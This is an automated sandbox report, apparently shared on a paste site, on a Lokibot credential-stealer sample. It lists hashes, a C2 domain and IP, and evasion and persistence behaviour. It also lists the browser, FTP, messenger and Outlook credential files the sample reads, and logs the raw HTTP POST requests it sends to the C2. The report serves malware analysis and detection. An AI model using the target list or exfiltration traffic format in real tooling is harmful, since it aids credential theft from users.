· 6 years ago · Sep 04, 2019, 11:23 PM
1
2* ID: 1105
3* MalFamily: "Lokibot"
4
5* MalScore: 10.0
6
7* File Name: "Exes_9441e9e3ea30f1768c266c5107d828d4.exe"
8* File Size: 905216
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "0f448c200f7ed69bb37205a9f63413574b5df77927d955e01484643643a7cff2"
11* MD5: "9441e9e3ea30f1768c266c5107d828d4"
12* SHA1: "82582d49f19ca542de27a2a194f565277aecd7d8"
13* SHA512: "c6ae116d64dd6e2d4bec4a1dff880497fd5bc53c8cf479a8c84d3353ad9741e28db56f81d52bce5aaa843b41a8523d611272b84ef48098a48d692fe27475d462"
14* CRC32: "AD65EBFD"
15* SSDEEP: "3072:FXUyupFUtZvVm10gicxhOr+LHeFf6Xw3Q/tIlXjLdUXmjcziJX5:FXspFSA1ScxhxeFf2wItwyr"
16
17* Process Execution:
18 "0ZSgD8YVypOh.exe",
19 "wscript.exe",
20 "filename.exe",
21 "filename.exe",
22 "explorer.exe",
23 "services.exe",
24 "lsass.exe",
25 "WmiApSrv.exe",
26 "svchost.exe",
27 "WMIADAP.exe",
28 "WmiPrvSE.exe"
29
30
31* Executed Commands:
32 "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\"",
33 "C:\\Users\\user\\subfolder\\filename.vbs ",
34 "\"C:\\Users\\user\\subfolder\\filename.exe\"",
35 "C:\\Users\\user\\subfolder\\filename.exe ",
36 "C:\\Windows\\system32\\lsass.exe",
37 "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
38 "C:\\Windows\\system32\\svchost.exe -k netsvcs"
39
40
41* Signatures Detected:
42
43 "Description": "Behavioural detection: Executable code extraction",
44 "Details":
45
46
47 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
48 "Details":
49
50
51 "Description": "Creates RWX memory",
52 "Details":
53
54
55 "Description": "Possible date expiration check, exits too soon after checking local time",
56 "Details":
57
58 "process": "0ZSgD8YVypOh.exe, PID 1480"
59
60
61
62
63 "Description": "Detected script timer window indicative of sleep style evasion",
64 "Details":
65
66 "Window": "WSH-Timer"
67
68
69
70
71 "Description": "A process attempted to delay the analysis task.",
72 "Details":
73
74 "Process": "filename.exe tried to sleep 1804 seconds, actually delayed analysis time by 0 seconds"
75
76
77
78
79 "Description": "Reads data out of its own binary image",
80 "Details":
81
82 "self_read": "process: 0ZSgD8YVypOh.exe, pid: 1480, offset: 0x00000000, length: 0x000dd000"
83
84
85 "self_read": "process: wscript.exe, pid: 2768, offset: 0x00000000, length: 0x00000040"
86
87
88 "self_read": "process: wscript.exe, pid: 2768, offset: 0x000000f0, length: 0x00000018"
89
90
91 "self_read": "process: wscript.exe, pid: 2768, offset: 0x000001e8, length: 0x00000078"
92
93
94 "self_read": "process: wscript.exe, pid: 2768, offset: 0x00018000, length: 0x00000020"
95
96
97 "self_read": "process: wscript.exe, pid: 2768, offset: 0x00018058, length: 0x00000018"
98
99
100 "self_read": "process: wscript.exe, pid: 2768, offset: 0x000181a8, length: 0x00000018"
101
102
103 "self_read": "process: wscript.exe, pid: 2768, offset: 0x00018470, length: 0x00000010"
104
105
106 "self_read": "process: wscript.exe, pid: 2768, offset: 0x00018640, length: 0x00000012"
107
108
109
110
111 "Description": "A process created a hidden window",
112 "Details":
113
114 "Process": "0ZSgD8YVypOh.exe -> C:\\Users\\user\\subfolder\\filename.vbs"
115
116
117 "Process": "0ZSgD8YVypOh.exe -> C:\\Users\\user\\subfolder\\filename.exe"
118
119
120
121
122 "Description": "Drops a binary and executes it",
123 "Details":
124
125 "binary": "C:\\Users\\user\\subfolder\\filename.exe"
126
127
128
129
130 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
131 "Details":
132
133 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
134
135
136 "http_version_old": "HTTP traffic uses version 1.0"
137
138
139 "suspicious_request_iocs": "http://jiraiya.info/joe23/five/fre.php"
140
141
142
143
144 "Description": "Performs some HTTP requests",
145 "Details":
146
147 "url_iocs": "http://jiraiya.info/joe23/five/fre.php"
148
149
150
151
152 "Description": "A scripting utility was executed",
153 "Details":
154
155 "command": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\""
156
157
158
159
160 "Description": "Sniffs keystrokes",
161 "Details":
162
163 "SetWindowsHookExW": "Process: explorer.exe(2044)"
164
165
166
167
168 "Description": "Behavioural detection: Injection (Process Hollowing)",
169 "Details":
170
171 "Injection": "filename.exe(2696) -> filename.exe(2400)"
172
173
174
175
176 "Description": "Executed a process and injected code into it, probably while unpacking",
177 "Details":
178
179 "Injection": "filename.exe(2696) -> filename.exe(2400)"
180
181
182
183
184 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
185 "Details":
186
187 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 2586520 times"
188
189
190
191
192 "Description": "Steals private information from local Internet browsers",
193 "Details":
194
195 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
196
197
198
199
200 "Description": "Installs itself for autorun at Windows startup",
201 "Details":
202
203 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name"
204
205
206 "data": "C:\\Users\\user\\subfolder\\filename.vbs -Dirra"
207
208
209
210
211 "Description": "Creates a hidden or system file",
212 "Details":
213
214 "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
215
216
217 "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
218
219
220
221
222 "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious",
223 "Details":
224
225 "MicroWorld-eScan": "Gen:Trojan.Heur.VP2.3m0@a8D2rgoi"
226
227
228 "Cybereason": "malicious.3ea30f"
229
230
231 "Arcabit": "Trojan.Heur.VP2.E18DB1"
232
233
234 "Invincea": "heuristic"
235
236
237 "Symantec": "ML.Attribute.HighConfidence"
238
239
240 "APEX": "Malicious"
241
242
243 "BitDefender": "Gen:Trojan.Heur.VP2.3m0@a8D2rgoi"
244
245
246 "Ad-Aware": "Gen:Trojan.Heur.VP2.3m0@a8D2rgoi"
247
248
249 "Emsisoft": "Gen:Trojan.Heur.VP2.3m0@a8D2rgoi (B)"
250
251
252 "FireEye": "Generic.mg.9441e9e3ea30f176"
253
254
255 "SentinelOne": "DFI - Suspicious PE"
256
257
258 "Microsoft": "Trojan:Win32/Wacatac.B!ml"
259
260
261 "Endgame": "malicious (moderate confidence)"
262
263
264 "AegisLab": "Worm.Win32.WBNA.loM5"
265
266
267 "GData": "Gen:Trojan.Heur.VP2.3m0@a8D2rgoi"
268
269
270 "Acronis": "suspicious"
271
272
273 "MAX": "malware (ai score=89)"
274
275
276 "Qihoo-360": "HEUR/QVM03.0.A7BD.Malware.Gen"
277
278
279
280
281 "Description": "Creates a copy of itself",
282 "Details":
283
284 "copy": "C:\\Users\\user\\subfolder\\filename.exe"
285
286
287 "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
288
289
290
291
292 "Description": "Harvests credentials from local FTP client softwares",
293 "Details":
294
295 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
296
297
298 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
299
300
301 "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
302
303
304 "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
305
306
307 "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
308
309
310 "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
311
312
313 "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
314
315
316 "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
317
318
319 "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
320
321
322 "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
323
324
325
326
327 "Description": "Harvests information related to installed instant messenger clients",
328 "Details":
329
330 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
331
332
333
334
335 "Description": "Harvests information related to installed mail clients",
336 "Details":
337
338 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
339
340
341 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
342
343
344 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
345
346
347 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
348
349
350 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
351
352
353 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
354
355
356 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
357
358
359 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
360
361
362 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
363
364
365 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
366
367
368 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
369
370
371 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
372
373
374 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
375
376
377 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
378
379
380 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
381
382
383 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
384
385
386 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
387
388
389 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
390
391
392 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
393
394
395 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
396
397
398 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
399
400
401 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
402
403
404 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
405
406
407 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
408
409
410 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
411
412
413 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
414
415
416 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
417
418
419 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
420
421
422 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
423
424
425 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
426
427
428 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
429
430
431 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
432
433
434 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
435
436
437 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
438
439
440 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
441
442
443
444
445 "Description": "Collects information to fingerprint the system",
446 "Details":
447
448
449 "Description": "Created network traffic indicative of malicious activity",
450 "Details":
451
452 "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
453
454
455 "signature": "ET TROJAN LokiBot Fake 404 Response"
456
457
458 "signature": "ET TROJAN LokiBot Checkin"
459
460
461 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
462
463
464 "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
465
466
467 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
468
469
470 "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
471
472
473
474
475
476* Started Service:
477 "VaultSvc",
478 "wmiApSrv"
479
480
481* Mutexes:
482 "Local\\ZoneAttributeCacheCounterMutex",
483 "Local\\ZonesCacheCounterMutex",
484 "Local\\ZonesLockedCacheCounterMutex",
485 "6EFA73A4746045B65DEE781E",
486 "Global\\RefreshRA_Mutex_Lib",
487 "Global\\RefreshRA_Mutex",
488 "Global\\RefreshRA_Mutex_Flag",
489 "Global\\WmiApSrv",
490 "Global\\ADAP_WMI_ENTRY"
491
492
493* Modified Files:
494 "C:\\Users\\user\\subfolder\\filename.exe",
495 "C:\\Users\\user\\subfolder\\filename.vbs",
496 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
497 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
498
499
500* Deleted Files:
501 "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
502 "C:\\Users\\user\\subfolder\\filename.exe"
503
504
505* Modified Registry Keys:
506 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
507 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
508 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.106\\CheckSetting",
509 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.100\\CheckSetting",
510 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.102\\CheckSetting",
511 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.101\\CheckSetting",
512 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.104\\CheckSetting",
513 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.103\\CheckSetting",
514 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\S38OS404-1Q43-42S2-9305-67QR0O28SP23\\rkcybere.rkr",
515 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
516 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78.check.101\\CheckSetting",
517 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
518 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name",
519 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
520 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
521 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed"
522
523
524* Deleted Registry Keys:
525 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
526 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
527 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
528 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
529 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
530 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey"
531
532
533* DNS Communications:
534
535 "type": "A",
536 "request": "jiraiya.info",
537 "answers":
538
539 "data": "47.88.102.244",
540 "type": "A"
541
542
543
544
545
546* Domains:
547
548 "ip": "47.88.102.244",
549 "domain": "jiraiya.info"
550
551
552
553* Network Communication - ICMP:
554
555* Network Communication - HTTP:
556
557 "count": 2,
558 "body": "",
559 "uri": "http://jiraiya.info/joe23/five/fre.php",
560 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
561 "method": "POST",
562 "host": "jiraiya.info",
563 "version": "1.0",
564 "path": "/joe23/five/fre.php",
565 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
566 "port": 80
567
568
569 "count": 30,
570 "body": "",
571 "uri": "http://jiraiya.info/joe23/five/fre.php",
572 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
573 "method": "POST",
574 "host": "jiraiya.info",
575 "version": "1.0",
576 "path": "/joe23/five/fre.php",
577 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
578 "port": 80
579
580
581 "count": 1,
582 "body": "\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00",
583 "uri": "http://jiraiya.info/joe23/five/fre.php",
584 "user-agent": "Mozilla/4.08 (Charon; Inferno)",
585 "method": "POST",
586 "host": "jiraiya.info",
587 "version": "1.0",
588 "path": "/joe23/five/fre.php",
589 "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00",
590 "port": 80
591
592
593
594* Network Communication - SMTP:
595
596* Network Communication - Hosts:
597
598 "country_name": "United States",
599 "ip": "47.88.102.244",
600 "inaddrarpa": "",
601 "hostname": "jiraiya.info"
602
603
604
605* Network Communication - IRC: